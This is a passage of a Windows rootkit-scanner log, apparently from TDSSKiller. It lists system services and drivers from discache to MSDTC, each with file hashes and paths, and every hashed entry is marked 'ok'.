19:28:42.0304 0x0744  [ 1A050B0274BFB3890703D490F330C0DA, 79D74F4679A2EE040FAAF4D0392A9311239A10A5F8A5CCB48656C6F89B6D62FB ] discache        C:\Windows\system32\drivers\discache.sys
19:28:42.0305 0x0744  discache - ok
19:28:42.0333 0x0744  [ 565003F326F99802E68CA78F2A68E9FF, ABC42B24DBA4FFC411120E09278EF26AF56CCAB463B69B4BD6C530B4A07063D2 ] Disk            C:\Windows\system32\drivers\disk.sys
19:28:42.0337 0x0744  Disk - ok
19:28:42.0372 0x0744  [ 2A958EF85DB1B61FFCA65044FA4BCE9E, C83511685EE1CE85A5ADF9B5BE96C375A521601F66024BDC3EE044C0B6E85D69 ] dmvsc           C:\Windows\system32\drivers\dmvsc.sys
19:28:42.0375 0x0744  dmvsc - ok
19:28:42.0422 0x0744  [ 2FE30D71919C51131405797620E0A714, 16060DDC32EF95EB6E37B91D50A96AB53CB0DEBB3DFDCB31975D16361092ABA5 ] Dnscache        C:\Windows\System32\dnsrslvr.dll
19:28:42.0433 0x0744  Dnscache - ok
19:28:42.0456 0x0744  [ 366BA8FB4B7BB7435E3B9EACB3843F67, 65B7C61ACF34F1F0149045AA9E09A3F917A927963237A385A914D0B80551DC31 ] dot3svc         C:\Windows\System32\dot3svc.dll
19:28:42.0466 0x0744  dot3svc - ok
19:28:42.0492 0x0744  [ 8EC04CA86F1D68DA9E11952EB85973D6, 2E3FBC2D683D1274E8BC45EEEA87D43B77EDDCAAF0D453296D9FDA6B9D717071 ] DPS             C:\Windows\system32\dps.dll
19:28:42.0499 0x0744  DPS - ok
19:28:42.0537 0x0744  [ B918E7C5F9BF77202F89E1A9539F2EB4, C589A37DE50BBEF22E2DAA9682EA43147F614AA1AF7DAAA942BA5FC192313A0B ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
19:28:42.0539 0x0744  drmkaud - ok
19:28:42.0596 0x0744  [ 23F5D28378A160352BA8F817BD8C71CB, 11BF7B7E6276C28EFF74B8AF89B493CBB89B394D2A091708EDA15DA5C342FF19 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
19:28:42.0616 0x0744  DXGKrnl - ok
19:28:42.0648 0x0744  [ 8EEF52AD831471E323EE7364A8656D35, 815E8D320019F55497B716872DA02BA4DFBA3BE2DD29AF74DA86DD6B0BCE5FA6 ] e1yexpress      C:\Windows\system32\DRIVERS\e1y6032.sys
19:28:42.0654 0x0744  e1yexpress - ok
19:28:42.0689 0x0744  [ 8600142FA91C1B96367D3300AD0F3F3A, 5713625E27DF11FAAFDA7AC79899A6AD813166E167088FA990EC5DE87DBE83DF ] EapHost         C:\Windows\System32\eapsvc.dll
19:28:42.0693 0x0744  EapHost - ok
19:28:42.0827 0x0744  [ 024E1B5CAC09731E4D868E64DBFB4AB0, AB0826A74BBEE5B7A1B035861B665C79BC98305CFC7D82BEF420558FBD3EE994 ] ebdrv           C:\Windows\system32\drivers\evbdx.sys
19:28:42.0951 0x0744  ebdrv - ok
19:28:42.0977 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] EFS             C:\Windows\System32\lsass.exe
19:28:42.0980 0x0744  EFS - ok
19:28:43.0101 0x0744  [ A8C362018EFC87BEB013EE28F29C0863, 07971C681FBD391C0BA0172618AF8AD77520182207F1C57F134B34D6A113857F ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
19:28:43.0116 0x0744  ehRecvr - ok
19:28:43.0123 0x0744  [ D389BFF34F80CAEDE417BF9D1507996A, 12859B9925D7A4631DE61A820922F43F56ED23C2AF014CBF36322685E5CF641E ] ehSched         C:\Windows\ehome\ehsched.exe
19:28:43.0127 0x0744  ehSched - ok
19:28:43.0192 0x0744  [ 0ED67910C8C326796FAA00B2BF6D9D3C, 97FAA7627A162B0AEC15545E0165D13355D535B4157604BB87F8EEB72ECD24A8 ] elxstor         C:\Windows\system32\drivers\elxstor.sys
19:28:43.0205 0x0744  elxstor - ok
19:28:43.0211 0x0744  [ 8FC3208352DD3912C94367A206AB3F11, 69B65C12BDADD4B730508674B1B77C5496612B4ACCC447DB9AFE49ADEA8CBF02 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
19:28:43.0212 0x0744  ErrDev - ok
19:28:43.0266 0x0744  [ 582B3D9E30D8EEF562C2B5E4A492B18C, 5FE505A436DA47EDA8945D1C59D5D1CE298B0F53DAACAAB956BC39EA5ADC8F36 ] ESProtectionDriver C:\Windows\system32\drivers\mbae.sys
19:28:43.0269 0x0744  ESProtectionDriver - ok
19:28:43.0326 0x0744  [ F6916EFC29D9953D5D0DF06882AE8E16, ED41893960018D5EC2F7829B1DE4B6967D9FD074D60B11B9EB854E3E0948EC24 ] EventSystem     C:\Windows\system32\es.dll
19:28:43.0342 0x0744  EventSystem - ok
19:28:43.0369 0x0744  [ 2DC9108D74081149CC8B651D3A26207F, 75CB47923A867DDAC512701CE71DFCFC340FC3A2E27F4255D0836A1FBC463176 ] exfat           C:\Windows\system32\drivers\exfat.sys
19:28:43.0374 0x0744  exfat - ok
19:28:43.0383 0x0744  [ 7E0AB74553476622FB6AE36F73D97D35, 41463A255FDA1D550B3385EC7C73ABC343B1BBBE9CEE4DF9F2A8B3E7338C4947 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
19:28:43.0387 0x0744  fastfat - ok
19:28:43.0429 0x0744  [ 967EA5B213E9984CBE270205DF37755B, 43153E23210B03FAE16897D62D55B8742F834EDC695F8401EAB5DE307F62602D ] Fax             C:\Windows\system32\fxssvc.exe
19:28:43.0443 0x0744  Fax - ok
19:28:43.0469 0x0744  [ E817A017F82DF2A1F8CFDBDA29388B29, 4CC9320A21E6FEA2D16C48D6BEA14391B695BD541A3C5FDDAEEE086A414FC837 ] fdc             C:\Windows\system32\drivers\fdc.sys
19:28:43.0471 0x0744  fdc - ok
19:28:43.0487 0x0744  [ F3222C893BD2F5821A0179E5C71E88FB, A85B947249DBB986358CCD4B158DD58A9301F074F3C6CCCDEF2D01F432E59D1B ] fdPHost         C:\Windows\system32\fdPHost.dll
19:28:43.0489 0x0744  fdPHost - ok
19:28:43.0513 0x0744  [ 7DBE8CBFE79EFBDEB98C9FB08D3A9A5B, 0E76C29D2A974A3F2FBFCB63D066D4136B78E02F6B1F579B1865CA7A76193987 ] FDResPub        C:\Windows\system32\fdrespub.dll
19:28:43.0516 0x0744  FDResPub - ok
19:28:43.0521 0x0744  [ 6CF00369C97F3CF563BE99BE983D13D8, F65F35324A2FB9DFB533B1C4D089D990CC242218FE83414329D07B786D8EFF33 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
19:28:43.0523 0x0744  FileInfo - ok
19:28:43.0529 0x0744  [ 42C51DC94C91DA21CB9196EB64C45DB9, 388C68D12ECC8FFE3116FEAAF4DB7B80CF4A3F97E935788DD21C6ADE2369F635 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
19:28:43.0531 0x0744  Filetrace - ok
19:28:43.0536 0x0744  [ 87907AA70CB3C56600F1C2FB8841579B, CA1CD82A1CD453617CE5EA431A1836997F14E3580554E8A516D9FE1E9926D979 ] flpydisk        C:\Windows\system32\drivers\flpydisk.sys
19:28:43.0538 0x0744  flpydisk - ok
19:28:43.0553 0x0744  [ 7520EC808E0C35E0EE6F841294316653, 6EC65511B4838A7172A8F89E35C2F9DF4F0BFCE3BE12EDA790F3EB567102FF67 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
19:28:43.0559 0x0744  FltMgr - ok
19:28:43.0608 0x0744  [ FA6C66E4364D7DA57AADE5DCC03BB999, 9C0D0A04D2558CF60B7F7185CC9B369CDDD3B1C625960910CECF07611F288378 ] FontCache       C:\Windows\system32\FntCache.dll
19:28:43.0628 0x0744  FontCache - ok
19:28:43.0714 0x0744  [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F, DBED26852B99B362152DA9CD4F31A1883EF6F9B496F3CF3772A197BA72DB61DA ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
19:28:43.0721 0x0744  FontCache3.0.0.0 - ok
19:28:43.0745 0x0744  [ 1A16B57943853E598CFF37FE2B8CBF1D, 87609F46F3B8123552141FD70866E895220B1BBD92BC2B580CAF49201AA0197E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
19:28:43.0751 0x0744  FsDepends - ok
19:28:43.0769 0x0744  [ A574B4360E438977038AAE4BF60D79A2, 7255CCDDDAC4853FA72E6487408C4B7390CBA37549CE952929B2A9CF3327C616 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
19:28:43.0771 0x0744  Fs_Rec - ok
19:28:43.0783 0x0744  [ 8A73E79089B282100B9393B644CB853B, 844DC5AADFABBD050B967904B796BA06BFD64C9112616EA26229D084F8B3AD41 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
19:28:43.0790 0x0744  fvevol - ok
19:28:43.0798 0x0744  [ 65EE0C7A58B65E74AE05637418153938, 0E1A398ADD8411AF4CCC3344D67BE1B261320C58328BD5C5855A357476FAEBEF ] gagp30kx        C:\Windows\system32\drivers\gagp30kx.sys
19:28:43.0804 0x0744  gagp30kx - ok
19:28:43.0989 0x0744  [ 23F7AF7E0512C58467BC37FF4AF356A8, 385AD7844FC75FB319B120303A446359B3FEA4D84BF2F8FA481955E52788E076 ] GoogleChromeElevationService C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe
19:28:44.0005 0x0744  GoogleChromeElevationService - ok
19:28:44.0049 0x0744  [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
19:28:44.0065 0x0744  gpsvc - ok
19:28:44.0088 0x0744  gupdate - ok
19:28:44.0098 0x0744  gupdatem - ok
19:28:44.0127 0x0744  [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
19:28:44.0129 0x0744  hcw85cir - ok
19:28:44.0184 0x0744  [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
19:28:44.0193 0x0744  HdAudAddService - ok
19:28:44.0215 0x0744  [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
19:28:44.0218 0x0744  HDAudBus - ok
19:28:44.0222 0x0744  [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\drivers\HidBatt.sys
19:28:44.0224 0x0744  HidBatt - ok
19:28:44.0245 0x0744  [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\drivers\hidbth.sys
19:28:44.0248 0x0744  HidBth - ok
19:28:44.0264 0x0744  [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\drivers\hidir.sys
19:28:44.0267 0x0744  HidIr - ok
19:28:44.0306 0x0744  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\system32\hidserv.dll
19:28:44.0314 0x0744  hidserv - ok
19:28:44.0332 0x0744  [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
19:28:44.0334 0x0744  HidUsb - ok
19:28:44.0358 0x0744  [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
19:28:44.0363 0x0744  hkmsvc - ok
19:28:44.0390 0x0744  [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
19:28:44.0400 0x0744  HomeGroupListener - ok
19:28:44.0463 0x0744  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
19:28:44.0472 0x0744  HomeGroupProvider - ok
19:28:44.0493 0x0744  [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
19:28:44.0497 0x0744  HpSAMD - ok
19:28:44.0516 0x0744  [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
19:28:44.0529 0x0744  HTTP - ok
19:28:44.0545 0x0744  [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
19:28:44.0546 0x0744  hwpolicy - ok
19:28:44.0601 0x0744  [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\DRIVERS\i8042prt.sys
19:28:44.0604 0x0744  i8042prt - ok
19:28:44.0636 0x0744  [ A3CAE5D281DB4CFF7CFF8233507EE5AD, 2666107220B9F301193F2CF85A3D6B09E6E42CC150152D10A8886E47A3FD9B0D ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
19:28:44.0652 0x0744  iaStorV - ok
19:28:44.0743 0x0744  [ C521D7EB6497BB1AF6AFA89E322FB43C, BDDCFCBB5B76A9295669B5AC9F732D6127199ED5C300770B554C4E4794F66BB7 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
19:28:44.0765 0x0744  idsvc - ok
19:28:44.0964 0x0744  [ AD626F6964F4D364D226C39E06872DD3, 5D52F89930BB07D4D2D0FC12143BD233B5D2C238527B3B4CAD74736D1EC84218 ] igfx            C:\Windows\system32\DRIVERS\igdkmd32.sys
19:28:45.0153 0x0744  igfx - ok
19:28:45.0194 0x0744  [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\drivers\iirsp.sys
19:28:45.0195 0x0744  iirsp - ok
19:28:45.0269 0x0744  [ F95622F161474511B8D80D6B093AA610, F2320E25EB9B4AA9A8366BD3AA23EABEBE111A5610D3A62EBA47D90427D5BC26 ] IKEEXT          C:\Windows\System32\ikeext.dll
19:28:45.0292 0x0744  IKEEXT - ok
19:28:45.0311 0x0744  [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
19:28:45.0312 0x0744  intelide - ok
19:28:45.0327 0x0744  [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
19:28:45.0328 0x0744  intelppm - ok
19:28:45.0350 0x0744  [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
19:28:45.0354 0x0744  IPBusEnum - ok
19:28:45.0359 0x0744  [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
19:28:45.0362 0x0744  IpFilterDriver - ok
19:28:45.0378 0x0744  [ 4D65A07B795D6674312F879D09AA7663, 8D72FE0B51A6FF71F85D2602DB3AE91C8749F70869B6789552F047BA81411EDA ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
19:28:45.0391 0x0744  iphlpsvc - ok
19:28:45.0397 0x0744  [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
19:28:45.0400 0x0744  IPMIDRV - ok
19:28:45.0407 0x0744  [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
19:28:45.0410 0x0744  IPNAT - ok
19:28:45.0415 0x0744  [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
19:28:45.0418 0x0744  IRENUM - ok
19:28:45.0425 0x0744  [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
19:28:45.0427 0x0744  isapnp - ok
19:28:45.0448 0x0744  [ CB7A9ABB12B8415BCE5D74994C7BA3AE, 464BFF3F5EEE985BE075E23E1813F5CB82A9A0771A92C6D889B13B867BCDF647 ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
19:28:45.0455 0x0744  iScsiPrt - ok
19:28:45.0490 0x0744  [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
19:28:45.0491 0x0744  kbdclass - ok
19:28:45.0507 0x0744  [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\drivers\kbdhid.sys
19:28:45.0509 0x0744  kbdhid - ok
19:28:45.0529 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] KeyIso          C:\Windows\system32\lsass.exe
19:28:45.0531 0x0744  KeyIso - ok
19:28:45.0537 0x0744  [ 412CEA1AA78CC02A447F5C9E62B32FF1, E06859E2CE2AFA3CE521851F8810778ED1748B812E601A58786605096AACEA81 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
19:28:45.0540 0x0744  KSecDD - ok
19:28:45.0549 0x0744  [ 26C046977E85B95036453D7B88BA1820, 375B284AFB407CAE417D2090B112A0ED1CCD516ABFDDBFCD5D6AADE859F14ACD ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
19:28:45.0553 0x0744  KSecPkg - ok
19:28:45.0610 0x0744  [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
19:28:45.0621 0x0744  KtmRm - ok
19:28:45.0664 0x0744  [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\system32\srvsvc.dll
19:28:45.0671 0x0744  LanmanServer - ok
19:28:45.0699 0x0744  [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
19:28:45.0707 0x0744  LanmanWorkstation - ok
19:28:45.0777 0x0744  [ F7611EC07349979DA9B0AE1F18CCC7A6, 879AA7A391966F00761CA039C25EBC62F6712DD5461694911EEC673E12DE103E ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
19:28:45.0782 0x0744  lltdio - ok
19:28:45.0820 0x0744  [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
19:28:45.0838 0x0744  lltdsvc - ok
19:28:45.0850 0x0744  [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
19:28:45.0856 0x0744  lmhosts - ok
19:28:45.0890 0x0744  [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
19:28:45.0893 0x0744  LSI_FC - ok
19:28:45.0900 0x0744  [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
19:28:45.0903 0x0744  LSI_SAS - ok
19:28:45.0909 0x0744  [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
19:28:45.0911 0x0744  LSI_SAS2 - ok
19:28:45.0918 0x0744  [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
19:28:45.0922 0x0744  LSI_SCSI - ok
19:28:45.0928 0x0744  [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
19:28:45.0931 0x0744  luafv - ok
19:28:45.0966 0x0744  [ 72F8F21314E57AAAE02CA05BCEC5A57E, 4422573E0E51DD2670D2CF8FE13C3A6CE7C1A167BCD2F0F9627B4E58040C645E ] MBAMChameleon   C:\Windows\System32\Drivers\MbamChameleon.sys
19:28:45.0970 0x0744  MBAMChameleon - ok
19:28:45.0990 0x0744  [ 41E19BD5BF4DC7046A2001BB8A2129B4, 825A80FBA416E266E486CBA3FEA298FEEDA08A56A0D99641A276C5796920A55C ] MBAMFarflt      C:\Windows\system32\DRIVERS\farflt.sys
19:28:45.0992 0x0744  MBAMFarflt - ok
19:28:46.0077 0x0744  [ AEE50C6797E5D1D3D3BEDF3CDD10DCB4, 9BE7DEA30155212703C472030A42E5E584D807181BDB46EDF05699312767DD2D ] MBAMProtection  C:\Windows\system32\DRIVERS\mbam.sys
19:28:46.0082 0x0744  MBAMProtection - ok
19:28:46.0371 0x0744  [ 12B1CB3720AB5570D960D9DCEA6B7D98, BC134EAC9624BDE4590727752B6E73964180A6F5257C68B644482E2B04FE8514 ] MBAMService     C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
19:28:46.0463 0x0744  MBAMService - ok
19:28:46.0551 0x0744  [ BDAE47F08F10AAED0B629461727290B9, A65885EBACF4BEA453F61452206ACABBD6ABC267B7D8A0DD028BE8C27957C3CA ] MBAMSwissArmy   C:\Windows\System32\Drivers\mbamswissarmy.sys
19:28:46.0557 0x0744  MBAMSwissArmy - ok
19:28:46.0570 0x0744  [ 947EE0BC926E89B68BDA97E46FBB4836, 3957079BD1F06D7BF8F8185E8A10108CA8F2A183384B313BEB1980FD4FB6496F ] MBAMWebProtection C:\Windows\system32\DRIVERS\mwac.sys
19:28:46.0573 0x0744  MBAMWebProtection - ok
19:28:46.0604 0x0744  [ BFB9EE8EE977EFE85D1A3105ABEF6DD1, D2A84EBF0C0B7A14AD432FD2EF43CC12300027AEA3FA4075659FB088AB62B588 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
19:28:46.0609 0x0744  Mcx2Svc - ok
19:28:46.0638 0x0744  [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\drivers\megasas.sys
19:28:46.0641 0x0744  megasas - ok
19:28:46.0679 0x0744  [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
19:28:46.0687 0x0744  MegaSR - ok
19:28:46.0718 0x0744  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
19:28:46.0722 0x0744  MMCSS - ok
19:28:46.0727 0x0744  [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
19:28:46.0728 0x0744  Modem - ok
19:28:46.0749 0x0744  [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
19:28:46.0750 0x0744  monitor - ok
19:28:46.0757 0x0744  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
19:28:46.0758 0x0744  mouclass - ok
19:28:46.0763 0x0744  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
19:28:46.0765 0x0744  mouhid - ok
19:28:46.0771 0x0744  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
19:28:46.0776 0x0744  mountmgr - ok
19:28:46.0784 0x0744  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
19:28:46.0788 0x0744  mpio - ok
19:28:46.0795 0x0744  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
19:28:46.0797 0x0744  mpsdrv - ok
19:28:46.0824 0x0744  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
19:28:46.0840 0x0744  MpsSvc - ok
19:28:46.0848 0x0744  [ CEB46AB7C01C9F825F8CC6BABC18166A, AA98898204FC58878502C170FE6ED8BA681396DDD8BF3689D0C3642DEA87BEF8 ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
19:28:46.0851 0x0744  MRxDAV - ok
19:28:46.0901 0x0744  [ B272B4C3E085EA860C12F2E4FAF2FFA2, DA99D8223D9FB7BFA52E66B73D1E1AA47B76B45A649400F7898E8D65D8672E52 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
19:28:46.0905 0x0744  mrxsmb - ok
19:28:46.0915 0x0744  [ 9AC33EF26C8A3AD0F117D00EB7301D03, 403445B07DC55F9DF98CA11AC87D4231187A2472A4E107786A5845B213355F0A ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
19:28:46.0921 0x0744  mrxsmb10 - ok
19:28:46.0930 0x0744  [ E0ABDB5ED7E199E242A7D028E76C1D3A, 4014A1F0720F6D15A2FB0CF4F1F970595BC29929F92F461CDD68E4513F49563E ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
19:28:46.0933 0x0744  mrxsmb20 - ok
19:28:46.0938 0x0744  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
19:28:46.0939 0x0744  msahci - ok
19:28:46.0948 0x0744  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
19:28:46.0951 0x0744  msdsm - ok
19:28:46.0970 0x0744  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
19:28:46.0975 0x0744  MSDTC - ok
